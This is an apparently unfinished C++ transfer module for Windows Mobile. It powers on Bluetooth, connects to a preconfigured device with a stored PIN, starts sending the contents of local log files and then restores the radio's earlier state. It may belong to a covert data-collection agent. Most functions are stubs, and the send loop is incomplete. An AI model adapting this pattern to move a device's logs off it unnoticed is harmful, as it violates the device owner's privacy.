#include <exception>
using namespace std;

#include "Transfer.h"
#include "Status.h"

BOOL Transfer::ActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(bIsBtAlreadyActive && dwRadioMode == BTH_POWER_OFF){
		bIsBtAlreadyActive = FALSE;
		bIsBtActive = FALSE;
	}

	switch(dwRadioMode){
		case BTH_CONNECTABLE:
		case BTH_DISCOVERABLE:
			bIsBtAlreadyActive = TRUE;
			break;

		default:
			bIsBtAlreadyActive = FALSE;
			BthSetMode(BTH_CONNECTABLE);
			BthGetMode(&dwRadioMode);
			break;
	}

	if(dwRadioMode == BTH_POWER_OFF)
			return FALSE;

	bIsBtActive = TRUE;
	return bIsBtActive;
}

BOOL Transfer::DeActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(dwRadioMode == BTH_POWER_OFF){
		bIsBtActive = FALSE;
		return TRUE;
	}

	if(bIsBtAlreadyActive)
		return TRUE;

	BthSetMode(BTH_POWER_OFF);
	BthGetMode(&dwRadioMode);

	if(dwRadioMode != BTH_POWER_OFF){
		bIsBtActive = TRUE;
		return FALSE;
	}

	bIsBtActive = FALSE;
	return TRUE;
}

BOOL Transfer::ActivateWiFi() {
	throw "Not yet implemented";
}

BOOL Transfer::DeActivateWiFi() {
	throw "Not yet implemented";
}

BOOL Transfer::SetBTPin(UCHAR *pPin, UINT uLen) {
	if(pPin == NULL || uLen == 0 || uLen > 16)
		return FALSE;

	memset(BtPin, 0x00, 16);
	memcpy(BtPin, pPin, uLen);
	return TRUE;
}

BOOL Transfer::IsInternetConnectionAvailable() {
	throw "Not yet implemented";
}

void Transfer::MiniSleep(UINT delay) {
	throw "Not yet implemented";
}

BOOL Transfer::Send(UINT Type) {
	Log *log = new(std::nothrow) Log();
	list<WCHAR *> *logList;
	list<WCHAR *>::iterator iter;
	UINT logNum;
	HANDLE hFile;
	SOCKET localSocket;
	DWORD dwSize, dwData;
	INT ret;

	if(log == NULL)
		return FALSE;

	logList = log->ListLogs();

	if(logList == NULL){
		delete log;
		return FALSE;
	}

	logNum = logList->size();

	switch(Type){
		case CONF_SYNC_BT:
			localSocket = BTSocket;
			break;
		default: 
			break;
	}

	// Primo step del protocollo
	dwData = PROTO_SYNC_START;
	ret = send(localSocket, (CHAR *)&dwData, sizeof(dwData), 0);

	if(ret == SOCKET_ERROR){
		delete logList; // XXX - Cancellare anche il contenuto della lista
		delete log;
		return FALSE;
	}

	// Attendiamo la risposta
	ret = recv(localSocket, (CHAR *)&dwData, sizeof(dwData), 0);

	if(ret == SOCKET_ERROR){
		delete logList; // XXX - Cancellare anche il contenuto della lista
		delete log;
		return FALSE;
	}


	for(iter = logList->begin(); iter != logList->end(); iter++){
		hFile = CreateFile(*iter, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE)
			continue;

		if(GetFileSize(hFile, &dwSize) == NULL)
			continue;

		
	}

	logList->clear();
	delete logList;
	delete log;
	return TRUE;
}

BYTE* Transfer::Recv(UINT* len) {
	throw "Not yet implemented";
}

BOOL Transfer::Close(UINT type) {
	throw "Not yet implemented";
}

BOOL Transfer::SetBTMacAddress(UINT64 uMacAddress) {
	if(uMacAddress == 0)
		return FALSE;

	uBtMac = uMacAddress;

	return TRUE;
}

BOOL Transfer::SetWifiMacAddress(UINT pMacAddress) {
	throw "Not yet implemented";
}

BOOL Transfer::SetWifiSSID(WCHAR* pSSID) {
	throw "Not yet implemented";
}

BOOL Transfer::SetWifiKey(BYTE* pKey, UINT len, UINT type) {
	throw "Not yet implemented";
}

Transfer::Transfer() : bIsBtActive(FALSE), bIsWifiActive(FALSE), bIsBtAlreadyActive(FALSE), 
bIsWifiAlreadyActive(FALSE), uBtMac(0), retryTimes(0), pollInterval(0) {
	statusObj = Status::self();

	memset(BtPin, 0x00, sizeof(BtPin));
}

INT Transfer::Poll(UINT type) {
	throw "Not yet implemented";
}

BOOL Transfer::BtSend() {
	WSADATA wsd;
	list<ConfStruct *> *conf = NULL;
	list<ConfStruct *>::iterator iter;
	SOCKADDR_BTH sab;
	BTH_SOCKOPT_SECURITY bss;
	UINT poll, times, i;

	if(statusObj == FALSE)
		return FALSE;

	ZeroMemory(&sab, sizeof(SOCKADDR_BTH));
	ZeroMemory(&bss, sizeof(BTH_SOCKOPT_SECURITY));

	WAIT_AND_SIGNAL(statusObj->bConfigLock);
	conf = statusObj->GetConfigStruct();

	if(conf == NULL){
		UNLOCK(statusObj->bConfigLock);
		return FALSE;
	}

	for(iter = conf->begin(); iter != conf->end(); iter++){
		switch((*iter)->uConfId){
			case CONFIGURATION_BTMAC: 
				SetBTMacAddress(*(BT_ADDR *)((*iter)->pParams));
				break;
			case CONFIGURATION_BTPIN:
				SetBTPin((UCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;
			case CONFIGURATION_CONNRETRY:
				poll = *(UINT *)((*iter)->pParams);
				times = *(UINT *)((BYTE *)(*iter)->pParams + 4);
				SetPollInterval(poll, times);
				break;
			default: break;
		}
	}
	UNLOCK(statusObj->bConfigLock);
	
	sab.btAddr = uBtMac;
	sab.addressFamily = AF_BTH;
	sab.port = 1 & 0xff; // 1 e' il canale da utilizzare

	bss.btAddr = uBtMac;
	bss.iLength = strlen((CHAR *)BtPin);
	memcpy((CHAR *)bss.caData, (CHAR *)BtPin, strlen((CHAR *)BtPin));

	if(WSAStartup(MAKEWORD(1,0),&wsd) != 0)
		return FALSE;

	if(ActivateBT() == FALSE){
		WSACleanup();
		return FALSE;
	}

	BTSocket = socket(AF_BTH, SOCK_STREAM, BTHPROTO_RFCOMM);

	if(BTSocket == INVALID_SOCKET){
		DeActivateBT();
		WSACleanup();
		return FALSE;
	}

	i = 0;
	while(i < retryTimes){
		if(connect(BTSocket, (const sockaddr*)&sab, sizeof(sab)) == 0){
			if(Send(CONF_SYNC_BT) == TRUE){
				closesocket(BTSocket);
				WSACleanup();
				return TRUE;
			}
		}
	
		Sleep(pollInterval);
		i++;
	}

	closesocket(BTSocket);
	WSACleanup();
	return FALSE;
}

BOOL Transfer::WiFiSend() {
	throw "Not yet implemented";
}

BOOL Transfer::InternetSend() {
	throw "Not yet implemented";
}

BOOL Transfer::SetPollInterval(UINT uPoll, UINT uTimes) {
	pollInterval = uPoll;
	retryTimes = uTimes;

	if(pollInterval == 0)
		pollInterval = 1000;

	return TRUE;
}